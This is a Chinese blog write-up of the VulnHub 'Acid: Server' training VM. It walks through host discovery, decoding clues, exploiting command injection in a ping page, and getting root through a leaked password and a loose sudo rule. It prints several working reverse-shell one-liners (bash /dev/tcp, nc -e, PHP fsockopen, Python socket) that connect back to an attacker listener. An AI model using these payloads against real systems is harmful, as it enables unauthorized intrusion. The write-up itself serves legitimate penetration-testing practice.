ACID: SERVER靶机入侵笔记

于 2023-03-16 15:23:20 发布
阅读量158 收藏
点赞数
分类专栏: 靶机笔记 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RestoreJustice/article/details/129587608
版权

ACID: SERVER靶机入侵笔记

1、环境搭建

下载地址: https://download.vulnhub.com/acid/Acid.rar

​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。

2、信息收集

  • 主机发现

    使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.110.1/24

    图丢了 ·········

    192.168.110.133,为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.110.1/24

  • 端口扫描

    使用nmap扫描端口,并做服务识别和深度扫描(加-A参数):nmap -p- -A 192.168.110.133

在这里插入图片描述

发现只开放了33447端口Apache服务,Ubuntu系统

3、漏洞探测

靶机只开启了33447端口,所以应该只能从这里突破了

  • 查看源码寻找线索

在这里插入图片描述

首页源代码尾部发现一串字符串,想起了首页的提示

在这里插入图片描述

这应该是一个关键线索,编码加密过的提示信息:0x643239334c6d70775a773d3d

0x是16进制编码,将值643239334c6d70775a773d3d进行ASCII hex转码,变成:d293LmpwZw==

发现是base64编码,再进行解码,得到图片信息 wow.jpg

在这里插入图片描述
在这里插入图片描述

这时可以根据经验在首页直接加目录打:/image/wow.jpg 或者 /images/wow.jpg 或者 /icon/wow.jpg 网站的图片目录通常是这样命名。也可以利用dirbuster进行目录爆破,得到图片目录images。

最后在http://192.168.110.133:33447/images/wow.jpg找到图片。下载图片,用Notepad++打开寻找有用信息

在图片最后又找到一串字符串

37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34

在这里插入图片描述

转码得到一串MD5值:7aee0f6d588ed9905ee37f16a7c610d4

在这里插入图片描述

解密得到63425

在这里插入图片描述

暂时不知道有什么用,先记下

  • 目录扫描

    用了几个字典没有跑出什么来,这时注意到首页title的目录提示

在这里插入图片描述

访问发现是一个邮箱登录页面,先记录下,看后面能不能找到账号密码,再次爆破目录

在这里插入图片描述

依次访问,访问include.php发现可以文件包含,暂时没可利用的地方

在这里插入图片描述

发现cake.php需要登录才能访问,且页面title有目录提示

在这里插入图片描述

继续对/Magic_Box/子目录扫描

在这里插入图片描述

发现command.php页面是ping指定ip的功能,意味着可以构造命令执行

在这里插入图片描述
在这里插入图片描述

  • 利用命令执行反弹shell

    攻击机开启监听,构造反弹shell命令

    为避免转义和中断,在get、post请求中输入payload需要进行url编码。尝试bash反弹shell、nc反弹shell,如下payload都失败

    bash -i >& /dev/tcp/192.168.110.128/10086 0>&1
nc -e /bin/bash -d 192.168.110.128 10086

    后面验证下面的payload可以成功

    bash -c 'bash -i >& /dev/tcp/192.168.110.128/10086 0>&1'

php -r '$sock=fsockopen("192.168.64.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

    利用python反弹获得shell

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.128",10086));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在这里插入图片描述

4、提权

  • 使用python获得交互式shell

    python -c 'import pty;pty.spawn("/bin/bash")'

  • sudo -l和find / -perm -4000 -print 2>/dev/null 试了一下不能直接提权到root

  • 在tmp目录试了一下,wget、gcc命令不存在,这个靶机应该不能直接用内核提权,应该找一下看能不能找到密码

  • 查看用户

    在这里插入图片描述

    除root外还存在acid 和saman两个用户,想办法提权到任意一个

  • 查看用户文件

    这类提权一般是通过文件中查找普通用户密码,进而通过sudo或者suid提权,因此查找用户文件这条命令必不可少需要记忆并熟练使用

    find / -user acid 2>/dev/null

    查看acid所属文件,发现流量包hint.pcapng

在这里插入图片描述

  • 分析流量包

    将流量表拷贝到web目录,下载下来

在这里插入图片描述

使用Wireshark分析流量包,发现saman用户的密码:1337hax0r

在这里插入图片描述

  • 使用su切换到saman用户

在这里插入图片描述

  • sudo -l提权

    发现sudo配置不当,权限过大

    在这里插入图片描述

    直接使用sudo -i 切换到root权限

在这里插入图片描述

game over!

不要温顺地走进那个良夜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试实战-Fowsniff靶机入侵-附件资源
03-02
渗透测试实战-Fowsniff靶机入侵-附件资源
Acid靶场实战
m0_65149086的博客
05-04 355
云尘靶场,靶机渗透,Vulhnub,Acid
靶机渗透实战-Acid
qq_46540840的博客
02-04 3135
文章目录 这几天有点事情,靶机方面就没在更新,后边会积极的更新。 文章目录文章目录信息收集漏洞发现利用提权总结 信息收集 信息收集是必不可少的. 首先用自己的kali当攻击机,下载acid靶机 靶机下载地址 首先进行靶机发现 nmap -sn 192.168.240.1。1/24进行主机发现不尽兴端口扫描(128是kali地址) 然后对主机进行端口扫描 nmap -sV -T4 -A -p- 192.168.240.137 其中sV 扫描版本信息和开放的服务 , -A扫描开放端口的具体服务
ACID: SERVER-VulnHub靶机学习第一篇
qq_27466929的博客
08-23 390
ACID: SERVER
【数据库】事务、事务的四大特性(ACID)、三大并发问题、四种锁、事务的隔离级别
HU1656的博客
01-31 964
一、什么是事务? 事务是应用程序中一系列严密的操作,所有操作必须成功完成,否则在每个操作中所作的所有更改都会被撤消。也就是事务具有原子性,一个事务中的一系列的操作要么全部成功,要么一个都不做。 事务的结果有两种:当事务中的所有步骤全部成功执行完成时,事务提交。如果其中一个步骤失败,将发生回滚操作,撤消之前到事务开始时的所有操作。 二、事务的四个特性 事务具有四个特征:原子性( Atomicity ...
靶场渗透(二)——Acid渗透
Ramona的博客
08-02 868
测试环境 靶机Acid 打开虚拟机后设为nat模式 攻击机:kali,windows10 信息收集 • nmap扫描靶机Ip及开放端口 扫描ip:nmap -sP 192.168.111.1/24 扫描端口:nmap -p1-65535 -sV 靶机Ip 获取信息:ip为192.168.111.129 开放端口为33447/tcp 提供服务为web和apache 操作系统为ubun...
OWASP靶机、安全学习、测试
最新发布
05-24
这里提供的是owasp靶机的下载,下载后直接在虚拟机导入即可使用 OWASP靶机是一个开放式Web应用程序安全项目组织,旨在帮助计算机和互联网应用程序提供公正、实际、有成本效益的信息。在信息安全中OWASP TOP 10 是...
1-OSCP自学笔记-October靶机练习1
08-04
0、前言本教程为《OSCP自学笔记-靶机练习》系列之一的《October靶机练习》,在这个系列中笔者将抽取10台典型靶机作为练习目标,以OSCP学习及考试的角度
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
Acid靶机练习
yifujiadeng的博客
05-06 333
Acid靶机练习 网络结构: 环境搭建平台为VMware15,网络为nat模式,网段192.168.1.0/24 网络由攻击机kali、靶机组成 靶机ip:192.168.1.140 kali linux ip:192.168.1.137 信息收集: 主机发现: nmap -sP 192.168.1.0/24 下图中192.168.1.1为VMnet8网卡地址,1.3为网关地址,1.137为攻击机地址,因此推测目标主机地址为192.168.1.140 端口扫描: 可以看到目标机器使用了Apache作为中
靶机渗透实战1:Acid: Server
anbangsi3839的博客
07-12 262
一、准备说明: 攻击机:WMware 中的 Kali Linux 靶机:VMware 中的Acid: Server(下载地址:https://www.vulnhub.com/entry/acid-server,125/) 目标:Escalate the privileges to root and capture the flag 二、信息收集 2.1 查找靶机 IP 地址:...
渗透Gemimi靶机
午夜观星河
10-31 1190
渗透Gemimi靶机 1.nmap扫描与源码审计 使用Nmap扫描靶机如下。 发现22、80端口开着,访问web服务。 发现源码地址,下载源码审计。 发现疑似用户登录密码的信息: 尝试使用admin,1234登录,发现成功登录,如下所示: 登陆后,经过一番探索,发现有一个Edit profie和Export profile,体验这两个功能,我们发现Edit pro...
Acid渗透靶机使用说明
火柴人的博客
08-07 213
安全客:https://www.anquanke.com/post/id/105462 已经下载好,在桌面; 网上用很多使用教程;
【Vulnhub系列】Acid
大方子
11-28 1437
下载连接:https://download.vulnhub.com/acid/Acid.rar 靶机说明 Welcome to the world of Acid. Fairy tails uses secret keys to open the magical doors. 欢迎来到酸的世界。童话故事需要使用秘密钥匙打开魔法门。 目标 获得root权限和flag。 运行环境 ...
Vulnhub之acid靶机渗透流程
weixin_44255856的博客
08-03 975
1,检查靶机主机是否存活。 2,检查靶机开放的端口并对端口进行识别 发现33447端口存活(存在web服务) 由于只存在web服务和apache服务,所以只能从web服务和apache服务下手。 3,首先直接御剑一把梭 大概看了下,先放在这里。 F12查看网页源码,发现存在注释。 0x643239334c6d70775a773d3d16进制转换为字符串d293LmpwZw==,最终解码出来...
Acid靶机渗透
weixin_30567225的博客
08-03 715
Acid渗透靶机实战 攻击机:kali 192.168.41.147 靶机: acid 192.168.41.149 信息收集 ip发现 开启Acid靶机,通过nmap进行局域网存火主机扫描.![](https://img2018.cnblogs.com/blog/1357258/201907/1357258-20190725111009774-877137553.p...
靶机实战-Acid
滕财然的博客
01-26 782
Acid靶机实战 文章目录Acid靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问8080端口5、访问33447端口6、提权 1、主机发现 目标主机:192.168.232.160 我是用arp命令扫的,大家可自行选择 2、端口扫描 3、端口详细信息扫描 4、访问8080端口 只有一个文件,点击就会下载,先pass 5、访问33447端口 查看网页源代码: 发现一串16进制...
【HTB系列】靶机Teacher的渗透测试详解
大方子
04-27 1337
Kali: 10.10.14.50 靶机地址:10.10.10.153 先用nmap 对靶机进行扫描 nmap -sC -sV -sT 10.10.10.153 只开启了80端口,网页内容如下 一个静态的网页,还有一些其他的页面,Courses,Students等等 检查下网页的源代码,在GALLERY页面发现一个奇怪的点 ...
渗透Billu b0x2靶机
午夜观星河
10-31 1151
渗透Billu b0x2靶机 1.nmap扫描与漏洞寻找 使用nmap扫描,扫描结果如下: 发现开放了22、80、111、8080端口,先访问web服务,发现Drupal,寻找其漏洞。 找到后,下载exp,直接按照说明使用,成功连接服务器。 为了方便后续的操作,使用python脚本反弹shell,在kali使用nc命令监听4444端口,python脚本如下,其中192.168...
the planets: earth靶机
04-11
问题:关于行星:地球和静机。 回答:这个问题似乎出现了编码问题,其中“Earth静机”不是一个有意义的词语,因此无法给出明确的回答。如果问题中的“静机”是指其他行星,可以尝试使用正确的编码再次提交问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值